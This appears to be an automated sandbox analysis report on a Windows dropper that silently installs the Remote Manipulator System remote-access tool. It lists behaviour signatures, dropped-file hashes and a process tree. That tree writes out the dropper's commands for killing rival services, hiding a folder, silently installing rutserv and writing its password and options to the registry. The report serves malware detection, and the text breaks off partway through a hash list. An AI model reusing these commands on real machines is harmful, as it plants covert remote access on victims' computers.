Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-11-2022 04:45
Static task
static1
Behavioral task
behavioral1
Sample
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Resource
win7-20220812-en
General
-
Target
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
-
Size
3.3MB
-
MD5
3034a42900fbface754e83567cb1e8b8
-
SHA1
6538da3b999db0894615130fd300a4f2c225c108
-
SHA256
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8
-
SHA512
28bc6dd4d9893afe881b0dd456fb361aa3b151e2f3330432a96cf7ae77c429b6d2ff7a503f62ce71a6e0d247f42aa94b36fd1f8f125548226ed5355a8ca60330
-
SSDEEP
98304:GsTpLAuoFngsWRfajfdJf+S8kvah7iy7cYiwOBpIeWH:GsTp8uoF7fdJmRkyh7iehi1zwH
Malware Config
Signatures
-
Executes dropped EXE 9 IoCs
Processes:
7z.exeses.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.exepid process 652 7z.exe 800 ses.exe 5036 rutserv.exe 1656 rutserv.exe 4220 rutserv.exe 512 rutserv.exe 3552 rfusclient.exe 4064 rfusclient.exe 1684 rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.execmd.exeses.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ses.exe -
Loads dropped DLL 1 IoCs
Processes:
7z.exepid process 652 7z.exe -
Drops file in System32 directory 3 IoCs
Processes:
rutserv.exedescription ioc process File opened for modification C:\Windows\SysWOW64\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\rutserv.pdb rutserv.exe -
Drops file in Windows directory 31 IoCs
Processes:
cmd.exedescription ioc process File created C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp cmd.exe File created C:\Windows\spom\dd_vcredistMSI4F4B.txt cmd.exe File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_191538705.html cmd.exe File created C:\Windows\spom\ses.exe cmd.exe File created C:\Windows\spom\jawshtml.html cmd.exe File created C:\Windows\spom\wctC61E.tmp cmd.exe File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File created C:\Windows\spom\dd_vcredistUI4F4B.txt cmd.exe File created C:\Windows\spom\GBQHURCC-20220812-1921.log cmd.exe File created C:\Windows\spom\wct4E2A.tmp cmd.exe File created C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp cmd.exe File created C:\Windows\spom\aria-debug-4640.log cmd.exe File created C:\Windows\spom\dd_vcredistUI4F1D.txt cmd.exe File created C:\Windows\spom\GBQHURCC-20220812-1921a.log cmd.exe File created C:\Windows\spom\rfusclient.exe cmd.exe File created C:\Windows\spom\wct1510.tmp cmd.exe File created C:\Windows\spom\wct8E36.tmp cmd.exe File created C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp cmd.exe File created C:\Windows\spom\jusched.log cmd.exe File created C:\Windows\spom\wmsetup.log cmd.exe File created C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp cmd.exe File created C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp cmd.exe File created C:\Windows\spom\AdobeSFX.log cmd.exe File created C:\Windows\spom\chrome_installer.log cmd.exe File created C:\Windows\spom\rutserv.exe cmd.exe File created C:\Windows\spom\wct399A.tmp cmd.exe File created C:\Windows\spom\BroadcastMsg_1660332030.txt cmd.exe File created C:\Windows\spom\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe cmd.exe File created C:\Windows\spom\msedge_installer.log cmd.exe File created C:\Windows\spom\dd_vcredistMSI4F1D.txt cmd.exe File created C:\Windows\spom\JavaDeployReg.log cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 3624 sc.exe 1048 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4264 taskkill.exe 952 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exepid process 5036 rutserv.exe 5036 rutserv.exe 5036 rutserv.exe 5036 rutserv.exe 5036 rutserv.exe 5036 rutserv.exe 1656 rutserv.exe 1656 rutserv.exe 4220 rutserv.exe 4220 rutserv.exe 512 rutserv.exe 512 rutserv.exe 512 rutserv.exe 512 rutserv.exe 512 rutserv.exe 512 rutserv.exe 3552 rfusclient.exe 3552 rfusclient.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 1684 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
taskkill.exetaskkill.exerutserv.exerutserv.exerutserv.exedescription pid process Token: SeDebugPrivilege 4264 taskkill.exe Token: SeDebugPrivilege 952 taskkill.exe Token: SeDebugPrivilege 5036 rutserv.exe Token: SeDebugPrivilege 4220 rutserv.exe Token: SeTakeOwnershipPrivilege 512 rutserv.exe Token: SeTcbPrivilege 512 rutserv.exe Token: SeTcbPrivilege 512 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.execmd.exeses.execmd.exenet.exenet.exedescription pid process target process PID 4656 wrote to memory of 4116 4656 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe cmd.exe PID 4656 wrote to memory of 4116 4656 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe cmd.exe PID 4656 wrote to memory of 4116 4656 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe cmd.exe PID 4116 wrote to memory of 652 4116 cmd.exe 7z.exe PID 4116 wrote to memory of 652 4116 cmd.exe 7z.exe PID 4116 wrote to memory of 652 4116 cmd.exe 7z.exe PID 4116 wrote to memory of 800 4116 cmd.exe ses.exe PID 4116 wrote to memory of 800 4116 cmd.exe ses.exe PID 4116 wrote to memory of 800 4116 cmd.exe ses.exe PID 800 wrote to memory of 5116 800 ses.exe cmd.exe PID 800 wrote to memory of 5116 800 ses.exe cmd.exe PID 800 wrote to memory of 5116 800 ses.exe cmd.exe PID 5116 wrote to memory of 4264 5116 cmd.exe taskkill.exe PID 5116 wrote to memory of 4264 5116 cmd.exe taskkill.exe PID 5116 wrote to memory of 4264 5116 cmd.exe taskkill.exe PID 5116 wrote to memory of 952 5116 cmd.exe taskkill.exe PID 5116 wrote to memory of 952 5116 cmd.exe taskkill.exe PID 5116 wrote to memory of 952 5116 cmd.exe taskkill.exe PID 5116 wrote to memory of 4988 5116 cmd.exe net.exe PID 5116 wrote to memory of 4988 5116 cmd.exe net.exe PID 5116 wrote to memory of 4988 5116 cmd.exe net.exe PID 4988 wrote to memory of 5092 4988 net.exe net1.exe PID 4988 wrote to memory of 5092 4988 net.exe net1.exe PID 4988 wrote to memory of 5092 4988 net.exe net1.exe PID 5116 wrote to memory of 3764 5116 cmd.exe net.exe PID 5116 wrote to memory of 3764 5116 cmd.exe net.exe PID 5116 wrote to memory of 3764 5116 cmd.exe net.exe PID 3764 wrote to memory of 4092 3764 net.exe net1.exe PID 3764 wrote to memory of 4092 3764 net.exe net1.exe PID 3764 wrote to memory of 4092 3764 net.exe net1.exe PID 5116 wrote to memory of 3624 5116 cmd.exe sc.exe PID 5116 wrote to memory of 3624 5116 cmd.exe sc.exe PID 5116 wrote to memory of 3624 5116 cmd.exe sc.exe PID 5116 wrote to memory of 1048 5116 cmd.exe sc.exe PID 5116 wrote to memory of 1048 5116 cmd.exe sc.exe PID 5116 wrote to memory of 1048 5116 cmd.exe sc.exe PID 5116 wrote to memory of 4840 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4840 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4840 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3704 5116 cmd.exe attrib.exe PID 5116 wrote to memory of 3704 5116 cmd.exe attrib.exe PID 5116 wrote to memory of 3704 5116 cmd.exe attrib.exe PID 5116 wrote to memory of 5036 5116 cmd.exe rutserv.exe PID 5116 wrote to memory of 5036 5116 cmd.exe rutserv.exe PID 5116 wrote to memory of 5036 5116 cmd.exe rutserv.exe PID 5116 wrote to memory of 1656 5116 cmd.exe rutserv.exe PID 5116 wrote to memory of 1656 5116 cmd.exe rutserv.exe PID 5116 wrote to memory of 1656 5116 cmd.exe rutserv.exe PID 5116 wrote to memory of 3684 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3684 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3684 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4824 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4824 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4824 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4996 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4996 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4996 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4748 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4748 5116 cmd.exe reg.exe PID 5116 wrote to memory of 4748 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3364 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3364 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3364 5116 cmd.exe reg.exe PID 5116 wrote to memory of 3048 5116 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\new.bat" "2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exe7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\ses.exe"C:\Users\Admin\AppData\Local\Temp\ses.exe" -p3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\83CB.tmp\15971.bat" -p "4⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet stop netaservice5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop netaservice6⤵
-
C:\Windows\SysWOW64\net.exenet stop rmanservice5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rmanservice6⤵
-
C:\Windows\SysWOW64\sc.exesc delete netaservice5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete rmanservice5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\spom"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"rutserv.exe" /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"rutserv.exe" /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0070006c0075007400750073003100320033004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00420044003600330046003600340038002d0043004300360043002d0034004200430033002d0041003100390046002d003800420041004400450045004200300030003700390033007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00350036003000300036003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a005⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034005⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003500360030003000360022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a005⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c7465725479706502021750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736509055369644964061034313936322e37343233343034353134084c6963656e73657306ae524d532d462d31393738444135303863433339363536326343663341363644613832323265446269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c465644676f424167526c645738645556554f446c5246446d463966674d494841494341514a76593370704167304c4177734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223536303036223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f64655365740800005⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a005⤵
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"rutserv.exe" /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeC:\Users\Admin\AppData\Local\Temp\rutserv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.dllFilesize
893KB
MD504ad4b80880b32c94be8d0886482c774
SHA1344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
SHA256a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338
SHA5123e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb
-
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.dllFilesize
893KB
MD504ad4b80880b32c94be8d0886482c774
SHA1344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
SHA256a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338
SHA5123e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb
-
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exeFilesize
160KB
MD5a51d90f2f9394f5ea0a3acae3bd2b219
SHA120fea1314dbed552d5fedee096e2050369172ee1
SHA256ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
SHA512c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
-
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exeFilesize
160KB
MD5a51d90f2f9394f5ea0a3acae3bd2b219
SHA120fea1314dbed552d5fedee096e2050369172ee1
SHA256ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
SHA512c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
-
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\Sys.7zFilesize
2.2MB
MD5be88b8b3ce26e220162b65029b3f0b38
SHA1468389733444173e91f2ac208d500deed637a241
SHA256502b5953ebbe874002969c68d581cdb83dcf2fc4e83cc4a6f9637a0b486ed4b5
SHA51236f268fa91244da34148803896a989d385bb7a0bfafe2908ca326e8f099d69791d5a32fa6b6b8ef0427adf7c128c844b6c79c246df7638e81afb7693f2784dcb
-
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\new.batFilesize
65B
MD513310849fd8d70c608fd7b02fa86eea5
SHA19e79bc5cc474fefbe6ec40f8403ba74bb271f393
SHA25603d09ae50ba37137bb7aa3a3290224a5e91d482b933a839a75797ea5c23e9b42
SHA512909a92f88da3d2ac6464e2c616976dae2d1ce97d01925473cf3e93a364a4bdc646d9d95412aff95876e614163447420faa68cf3bac33fed6d7220b195e838c30
-
C:\Users\Admin\AppData\Local\Temp\83CB.tmp\15971.batFilesize
10KB
MD564736420a3b8c3061f89d2bdac26465c
SHA1306f8e23b6c979e863cca7f238dd229543e40b35
SHA256ee83c47bbf15ba057fcd6beb952fb902b38dcab7f7465e6f4f6be533ef2cc119
SHA5129983348bbbabefe96db162970d1f5bcd7055c9f975abb00d06b3784a586a59229dbd6a9cf97400cba9ce1e56fab219fa5840d0fe7b1d0f3de7784c3b4e574add
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeFilesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeFilesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeFilesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeFilesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
